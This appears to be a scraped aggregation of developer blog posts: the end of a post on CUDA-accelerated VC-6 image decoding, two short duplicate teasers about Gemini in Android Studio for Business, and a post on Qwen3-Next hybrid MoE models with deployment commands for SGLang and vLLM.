Nsight Systems shows the decode work split between the CPU (bitstream parse, root nodes) and the GPU (tile residual decode, reconstruction). The latency-optimized single-image path under-utilizes the GPU, and throughput mode is where CUDA shines. Three hotspots guided our plan:

  • Kernel‑launch overhead in upsampling chains: At low LoQs, small kernels interleave with launch overhead. CUDA Graphs prototypes significantly reduce inter‑kernel gaps. We’re also exploring kernel fusion across early LoQs whose intermediates are never consumed.
  • Kernel efficiency: Nsight Compute flagged branch divergence, register spills, and non‑coalesced IO in some stages. Cleaning these up should raise occupancy and throughput.
  • Kernel-level parallelism: Currently, each decode launches its own chain of kernels, which is subpar compared to scaling the launch grid dimensions. A series of kernels is launched per image, which does not scale perfectly because there is a hard limit on concurrently executing kernels on the GPU.

Upsampling chains

Figure 5. Upsampling kernel chains

A chain of upsampling kernels (Figure 5) reconstructs the image at successively higher LoQs. At lower LoQs, the proportion of useful computation (blue) versus overhead (white) is significant. Techniques such as CUDA Graphs or kernel fusion can speed up computation by reducing the overhead between each of these kernels.

The Nsight trace also shows low GPU utilization due to the small grid dimensions. The first upsample kernel in particular launches only a single block, which exercises only one streaming multiprocessor (SM). With 188 SMs on an RTX PRO 6000, decoding a single image essentially uses only 1/188th of the GPU.

In theory, this would let us use the other 187/188ths of the GPU to decode additional images in parallel. In practice, this is called kernel-level parallelism, and it isn’t the best way to utilize an NVIDIA GPU.

Kernel-level parallelism

Figure 6. Kernel-level parallelism

The Nsight Systems trace in Figure 6 shows three concurrent decoders launched as Python threads on the CPU (bottom) and their corresponding GPU activity (top). Each decode (blue) runs on its own stream. While this enables the GPU scheduler to launch these kernels simultaneously, it’s more efficient to launch a single larger grid on the GPU. Kernel-level parallelism can lead to scheduling conflicts and resource contention, and there is a hard limit on concurrently executable kernels that depends on the compute capability. As another upside, a single larger grid also significantly reduces the CPU overhead incurred by the three concurrent threads.

Conclusions

AI pipelines don’t just need faster models; they need data delivered at the rate at which it can be processed. By aligning VC-6’s hierarchical, selective architecture with CUDA’s powerful parallelism, we can significantly accelerate the path from storage to tensor. This approach complements established libraries by providing an AI-native solution for workloads where selective LoQ/RoI decoding and GPU-resident data offer immediate advantages.

The CUDA implementation is a practical building block you can use today to make your data pipelines faster and more efficient. While the current alpha version already delivers benefits, ongoing collaboration with NVIDIA engineers on native batching and kernel optimizations promises to unlock even greater throughput. As a next step, this initial CUDA implementation will enable tighter integration with popular AI SDKs and data loading pipelines. If you’re building high-throughput, multimodal AI systems, now is the time to explore how VC-6 on CUDA can accelerate your workflows.

The VC-6 SDKs for CUDA (alpha), OpenCL, and CPU are available with C++ and Python APIs.

  • SDK and docs: Access the SDK Portal and documentation via V-Nova.
  • Trial access: Contact V-Nova at ai@v-nova.com for the CUDA alpha wheel and benchmark scripts.
  • Samples on GitHub 

[ad_2]

Build High-Performance Vision AI Pipelines with NVIDIA CUDA-Accelerated VC-6

Android Developers Blog: Android Studio for Enterprises

[ad_1]

Gemini in Android Studio for Business: Develop with confidence, backed by AI

Posted by Sandhya Mohan – Product Manager. To empower Android developers in the workplace, we are excited to announce a new Gemini offering …


Android Studio for Enterprises

Gemini for enterprises

[ad_2]

Android Developers Blog: Android Studio for Enterprises

Android Developers Blog: Gemini for Enterprises

[ad_1]

Gemini in Android Studio for Business: Develop with confidence, backed by AI

Posted by Sandhya Mohan – Product Manager. To empower Android developers in the workplace, we are excited to announce a new Gemini offering …


Android Studio for Enterprises

Gemini for enterprises

[ad_2]

Android Developers Blog: Gemini for Enterprises

New Open Source QWEN3-Next Models Preview Hybrid MoE Architecture, Delivering Better Accuracy and Accelerated Parallel Processing Across NVIDIA Platforms

[ad_1]

As AI models grow larger and process longer text sequences, efficiency becomes as important as scale.

To showcase what’s next, Alibaba released two new open models, QWEN3-Next 80B-A3B-Thinking and QWEN3-Next 80B-A3B-Instruct, previewing a new hybrid mixture-of-experts (MoE) architecture with the research and developer community.

Qwen3-Next-80B-A3B-Thinking is now live on build.nvidia.com, giving developers instant access to test its advanced reasoning capabilities directly in the UI or through the NVIDIA NIM API.

The new architecture of these QWEN3-Next models is optimized for long context lengths (>260K input tokens) and large-scale parameter efficiency. Each model has 80B total parameters, but only 3B are activated per token thanks to the sparse MoE structure, delivering big-model capability with smaller-model efficiency. The MoE module has 512 routed experts and 1 shared expert, with 10 experts activated per token.
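As a rough illustration of that sparsity, here is a toy NumPy sketch of top-k expert routing. It is not the Qwen3-Next implementation; the hidden size, expert weights, and gating details are made up purely to show how only a few experts are activated per token.

# Toy sketch of sparse top-k MoE routing: each token activates only a few of the
# routed experts plus one shared expert. Sizes are illustrative, not Qwen3-Next's.
import numpy as np

d_model, n_experts, top_k = 64, 512, 10
rng = np.random.default_rng(0)

router_w = rng.standard_normal((d_model, n_experts))
experts = rng.standard_normal((n_experts, d_model, d_model)) * 0.02
shared_expert = rng.standard_normal((d_model, d_model)) * 0.02

def moe_layer(token):                      # token: vector of shape (d_model,)
    logits = token @ router_w              # score all routed experts
    top = np.argsort(logits)[-top_k:]      # keep only the top-k experts
    gates = np.exp(logits[top]) / np.exp(logits[top]).sum()
    routed = sum(g * (token @ experts[i]) for g, i in zip(gates, top))
    return routed + token @ shared_expert  # the shared expert always contributes

out = moe_layer(rng.standard_normal(d_model))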

The performance of MoE models like QWEN3-Next, which route requests across 512 different experts, depends heavily on inter-GPU communication. Blackwell’s fifth-generation NVLink provides 1.8 TB/s of direct GPU-to-GPU bandwidth. This high-speed fabric is critical for minimizing latency during expert routing, translating directly into faster inference and higher token throughput in AI factories.

The model has 48 layers; every 4th layer uses GQA attention while the remaining layers use the new linear attention. Large language models (LLMs) use attention layers to interpret and assign importance to each token of the input sequence. Less mature software stacks lack pre-optimized primitives for new architectures, or the specific fusions needed to make the constant switching between attention types efficient.

Figure 1. General representation of how an input sequence is parsed and weighted by a transformer

To achieve its long input-context capability, the model uses Gated DeltaNet from NVIDIA Research and MIT. Gated DeltaNet improves focused sequence processing so the model can handle very long text efficiently without drifting or forgetting what matters. This lets it process extremely long sequences efficiently, with memory and compute scaling nearly linearly with sequence length.

Beyond these architectural innovations, the models can run on NVIDIA Hopper and Blackwell for optimized inference performance. NVIDIA’s flexible CUDA programming architecture enables experimentation with new and unique approaches, supporting both the full attention layers of traditional transformer models and the linear attention layers in the QWEN3-Next models. When run on NVIDIA, the hybrid approach seen in the QWEN3-Next models can lead to efficiency gains, paving the way for greater token generation and revenue for AI factories.

Figure 2. Configuration of the 48 layers in the model: boxes from left to right represent the first layers, the middle layers, and the outermost layer, with each box containing three linear attention layers and one full attention layer

NVIDIA collaborated with the open source SGLang and vLLM frameworks to enable model deployment for the community, as well as packaging both models as NVIDIA NIM. Developers can consume leading open models through enterprise software containers, depending on their needs.

Deploying with SGLang

Users deploying the model with the SGLang serving framework can use the following instructions. See the SGLang documentation for more information and configuration options.

python3 -m sglang.launch_server --model Qwen/Qwen3-Next-80B-A3B-Instruct --tp 4

Deploying with vLLM

Users deploying the model with the vLLM framework can use the following instructions. See the vLLM announcement blog for more information.

uv pip install vllm --extra-index-url https://wheels.vllm.ai/nightly --torch-backend=auto
vllm serve Qwen/Qwen3-Next-80B-A3B-Instruct -tp 4

Production-ready deployment with NVIDIA NIM

Enterprise developers can try QWEN3-Next-80B-A3B, along with the rest of the QWEN models, for free using the NVIDIA-hosted NIM microservice endpoints in the NVIDIA API catalog. Packaged, optimized NIM microservices for these models will also be available for download soon.
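For a quick test of the hosted endpoint, the API catalog exposes an OpenAI-compatible interface. The sketch below assumes the integrate.api.nvidia.com base URL, a placeholder API key, and an assumed model ID; confirm the exact model name on build.nvidia.com.

# Sketch: call the NVIDIA-hosted endpoint through its OpenAI-compatible API.
# The model ID and API key below are placeholders; confirm them on build.nvidia.com.
from openai import OpenAI

client = OpenAI(
    base_url="https://integrate.api.nvidia.com/v1",
    api_key="$NVIDIA_API_KEY",  # placeholder: use your NVIDIA API catalog key
)

response = client.chat.completions.create(
    model="qwen/qwen3-next-80b-a3b-thinking",  # assumed model ID
    messages=[{"role": "user", "content": "Summarize the benefits of sparse MoE models."}],
    max_tokens=512,
)
print(response.choices[0].message.content)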

Building on the strength of open source AI

The new QWEN3-Next hybrid MoE architecture pushes the boundaries of efficiency and reasoning, marking significant progress for the community. Making these models openly available empowers researchers and developers everywhere to experiment, build, and accelerate innovation. At NVIDIA, we share this commitment to open source through contributions such as NeMo for AI lifecycle management, Nemotron LLMs, and Cosmos World Foundation Models (WFMs). We work alongside the community to advance the state of AI. Together, these efforts ensure that the future of AI models is not only more powerful, but also more accessible, transparent, and collaborative.

Get started today

Try the models on OpenRouter: qwen3-next-80b-a3b-thinking and qwen3-next-80b-a3b-instruct, or download them from Hugging Face: qwen3-next-80b-a3b-thinking and qwen3-next-80b-a3b-instruct

[ad_2]

New Open Source QWEN3-Next Models Preview Hybrid MoE Architecture, Delivering Better Accuracy and Accelerated Parallel Processing Across NVIDIA Platforms